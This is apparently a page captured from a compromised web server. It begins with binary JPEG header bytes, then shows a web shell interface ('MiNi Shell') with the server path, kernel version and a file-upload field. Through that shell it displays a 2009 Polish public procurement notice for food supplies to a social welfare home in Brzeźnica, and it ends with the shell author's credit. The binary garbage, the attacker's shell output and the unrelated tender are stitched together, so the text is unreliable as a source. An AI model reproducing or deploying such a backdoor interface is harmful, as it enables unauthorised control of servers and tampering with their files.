JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/45388-N-2009.html

<p class="kh_header"><b>Brzeźnica: Dostawa żywności.</b><br>
<b>Numer ogłoszenia: 45388 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Brzeźnica 78, 57-256 Brzeźnica, woj. dolnośląskie, tel. 0-74 8170918, faks 0-74 8170918.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.biuletyn.abip.pl/dps.brzeznica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu powiatowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są cykiczne dostawy żywności na potrzeby Domu Pomocy Społecznej w Brzeźnicy.15100000-9- Mięso i produkty mięsne:boczek wędzony b/ż5,5 kg,boczek wędzony z/żeb.32kg, boczek po węgiersku 29kg,boczek tortowy 20kg,flaki wołowe 13,5kg,golonka w galarewcie 8kg, golonka wp tylna 50kg, kaszanka 67kg, kiełbasa biała surowa 9kg, kiełbasa krakowska pods. 14kg, kiełbasa krakowska parzona 73kg, kiełbasa rawska 101kg, kiełbasa śląska 46kg, kiełbasa zwyczajna 287kg.kiełbasa żywiecka 26kg, kości wieprzowe 22kg, kolanka wieprzowe 20kg,lanszmit 80kg,łopatka wieprz.b/k 746kg,łopatka wołowa b/k 301kg, mortadela 33kg,mięso gulaszowe 16kg, mielonka wieprzowa 107kg, parówka gruba 217kg,pasztet pieczony 54kg, pasztetowa z wkładem 56kg,pieczeń staropolska 2kg,pieczeń rzymska 101kg,polędwica drobiowa 152kg, porcje rosołowe 943kg,przysmak myśliwski 119kg,salceson podrobowy 5kg,salceson wiejski 122kg,schab b/k 37kg. schab z/k 225kg, smalec wieprzowy 223kg,szynka delikatesowa 4kg,szynka z indyka 130kg, szynka łopatkowa 24 kg,szynka śniadaniowa 121kg. szynka tyrolska 66 kg,szynka wieprz.gotowana 135 kg, szynka wieprz. z lisciem 71kg, uda drobiowe 545kg,wątroba wieprzowa 20 kg,wędzonka krotoszyńska 46 kg, żołądki drobiowe 50kg.  15300000-1 Owoce ,warzywa i podobne produkty: banany 600kg,buraki czerwone 870kg, brokuły 61 szt,brukselka 50kg, cebula 908 kg,czosnek 12 kg, fasolka szparagowa 67 kg, kalafior świeży 450 szt, kapusta biała cięta 330kg, kapusta biała 497 kg, kapusta biała 232 szt, kapusta czerwona 154 kg, kapusta czewona 25 szt, kapusta pekińska 289 kg, koperek 944szt, marchew 1700kg, natka pęcz.922, ogórek świeży 245 kg, papryka czerwona 12kg, pieczarki 90kg, pietruszka 372 kg, pomidory 900kg, por 126kg, por 399 szt,rzepa czarna 21kg, rzodkiew biała 65kg, rzodkiewka pęczek 350szt.sałata zielona 500 szt,sałata lodowa 100szt,seler 734 kg, szczypior pęczek 281 szt, szczaw świeży 25 kg, ziemniaki 6300 kg, ziemniaki młode 2200 kg,brzoskwinie 190kg, cytryny 140kg, gruszki 11kg, jablka 2400 kg, mandarynki 160kg, nektarynki 56 kg, pomarańcze 160kg, winogrona 100kg, śliwki węgierki 100kg, wiśnie 100kg.  15810000-9 Pieczywi :bułka pszenna -foremka 400g - 5422 szt, bułka słodka z serem i marmoladą 846 szt,chałka 0,5kg- 64szt, chleb 0,8kg- 3479 szt,chleb razowy 0,5kg-2210 szt, ciastko francuskie 65 szt, ciasto jogurtowe 300g- 44 szt, paluch 100g- 156szt, pączek mini-27kg, pączek nadziewany 72szt,piernik 300g-2szt, pizzerka 150g- 142szt, rogal wyborowy 358 szt, rogaliki z serem 147 kg. 15800000-6 Różne produkty spożywcze:aromaty15g-249 szt, barszcz biały 1kg-20szt, budyń z cukrem 40g- 337 szt,budyń b/cukru1kg-50szt, budyń z cukrem1kg-14szt,brzoskwinie w puszce -53szt, chrzan 32szt,cukier 2366kg, cukier puder 27 kg, cukier waniliowy 344szt, cynamon 196 szt, drożdże 13kg, dżem w/słodz.260g-347 szt,fasola sucha drobna 55kg,galaretka owocowa 80g- 1011szt, galaretka owocowa1kg-5szt,gałka muszkatałowa-14szt, groch suchy cały 35kg, groszek konserwowy 617szt, herbata 30kg, jabłka susz 47kg,jaja średnie 16663 szt, kakao 13kg, kasza manna-108kg,kasza jęczmienna-42kg, kasza gryczana 155kg, kawa zbożowa 176kg, kisiel40g-1034,kisiel b/cukru 1kg-13szt,kisiel z cukrem 1kg-70szt,kminek 20g- 61szt.koncentrat pomidor 200g-292szt,konserwa mięsna tyrolska 271szt, krakersy 250g-75szt,kukurydza konserwowa 130szt, kwasek cytrynowy 20g-88szt, liść laurowy -105szt, majeranek 61szt, majonez 3000ml 14szt,majonez 630g-74szt,majonez 300g-230szt,mak 37kg, makaron różny luz 552kg, marmolada 400g-24kg,mąka pszenna tortowa-700kg, mąka pszenna wrocławska 277kg, mąka ziemniaczana168kg, musztarda 200g-257szt,miód prawdziwy 86kg, ocet86l,ogórek konserwowy 0,9l-474szt,olej 1l-265szt, olej 3l-4 szt,orzechy włoskie 100g-161,papryka konserwowa -900g 169szt,papryka mielona 81szt, pasztet z drobiu 160g-1101,pieprz oryginalny 20g-134szt,pieprz ziołowy 20g-298szt,płatki jęczmienne400g- 144szt, płatki kukurydziane 250g- 346szt,płatki kukurydziane 1kg- 2szt,płatki owsiane 75kg,płatki ryżowe 400g- 103szt,podgrzybek suszony 2kg, proszek do pieczenia 18g-158szt, przecier ogórkowy300g- 59szt,przyprawa DELIKAT -65szt,przyprawa do piernika 20g-23 szt,przyprawa stołowa 3l-30szt,przyprawa warzywna 1kg-8 szt, przypr.warzywna Kucharek 200g-53szt,rodzynki 19kg,ryż- 299kg,ryż w saszetkach 400g-135szt,soda 50g-17szt, sos grzybowy 40g-50szt,sól-320kg,sucharki 300g-170szt,syrop wieloowocowy 330g-373szt,szczaw konserowoy 300g- 62szt,śliwka suszona 300g-30szt,wafle Grześki b/czekol-672szt,wafle Grześki z czekol-1324szt,wiórka kokosowe 100g- 63szt, ziele ang.15g-110szt,zupa ogonowa 1kg-16szt,zupa pieczarkowa 1kg-15szt,żelatyna wieprzowa 1kg-9 szt,dżem dla diabetyków 20g-200szt,ciastka dla diabetyków-100g-200szt,soso winegret 50g-100szt,sos do spagetti-50g-200szt.  15500000-3 Produkty mleczarskie: jogurt owocowy 150g-2282szt,masło śmietankowe 1048kg, margaryna mleczna-198kg,serek homogenizowany 250g- 1191szt,serek wiejski 150g-1639szt,swrek topiony krążki hochland-109kg, ser żółty plastry hochland 150g- 648szt,ser żółty -170kg,śmietana 12% 450g- 1329szt,twaróg półtłusty 629kg,jogurt naturalny 150g-200szt, ser feta 250g-85szt.  15511500-8 Mleko pełnotłuste- 14810l.  15200000-0 Ryby przetworzone i konserwowane: filet rybny mrożony z pangi 350kg, filet rybny mrożony z morszczuka 100kg, filet śledziowy po wiejsku w oleju 4,5kg - 40szt,karp żywy 50kg, konserwa rybna w pomidorach 310g - 198szt, makrela wędzona 174 kg, pasta rybna z makreli 36 kg, sałatka sledziowa 150g- 366szt, śledź po gdańsku w oleju 175g- 340szt, paprykarz szczeciński 260g -150szt, śledź po giżycku  4.5 kg -2-30szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.30.00.00-1, 15.81.00.00-9, 15.80.00.00-6, 15.50.00.00-3, 15.51.15.00-8, 15.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki-
posiadają oprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, znajdują się w sytuacji ekonomicznej i finansowej zapewniajacej wykonanie zamówienia, nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oświadczenie o spełnianiu warunków określone w art. 22.1 ustawy Prawo zamówień publicznych.
Złożenie aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej wystawione nie wczesniej niz 6 miesięcy przed upływem terminu składania ofert.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip.pl/dps.brzeznica.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
Brzeźnica 78
57-256 Bardo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2009 godzina 09:00, miejsce: Dom Pomocy Społecznej
Brzeźnica 78
57-256 Bardo.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com